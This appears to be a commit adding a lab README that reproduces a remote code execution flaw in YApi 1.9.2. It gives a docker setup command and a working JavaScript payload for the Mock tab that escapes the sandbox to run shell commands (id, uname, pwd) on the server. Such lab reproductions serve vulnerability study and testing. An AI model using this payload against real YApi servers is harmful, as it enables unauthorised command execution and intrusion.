first commit

yapi/unacc/README.md

@@ -0,0 +1,49 @@
+# YApi Registration and Mock Remote Code Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+YApi is a API management tool developed by Node.JS. If registration of the YApi server is enabled, attackers will be able to execute arbitrary Javascript code in the Mock page.
+
+References:
+
+- <https://paper.seebug.org/1639/>
+- <https://www.freebuf.com/vuls/279967.html>
+
+## Vulnerability Environment
+
+Execute following command to start a YApi server 1.9.2:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse the `http://localhost:3000` to see the index page of the YApi.
+
+## Vulnerability Reproduce
+
+Register a normal user then create a project and an interface:
+
+![](1.png)
+
+![](2.png)
+
+There is a "Mock Tab" that you can input JavaScript code, put the evil code into textarea:
+
+```
+const sandbox = this
+const ObjectConstructor = this.constructor
+const FunctionConstructor = ObjectConstructor.constructor
+const myfun = FunctionConstructor('return process')
+const process = myfun()
+mockJson = process.mainModule.require("child_process").execSync("id;uname -a;pwd").toString()
+```
+
+![](3.png)
+
+Then, go back to the preview tab and see the Mock URL:
+
+![](4.png)
+
+Open that URL, Mock script is executed and you can see the output:
+
+![](5.png)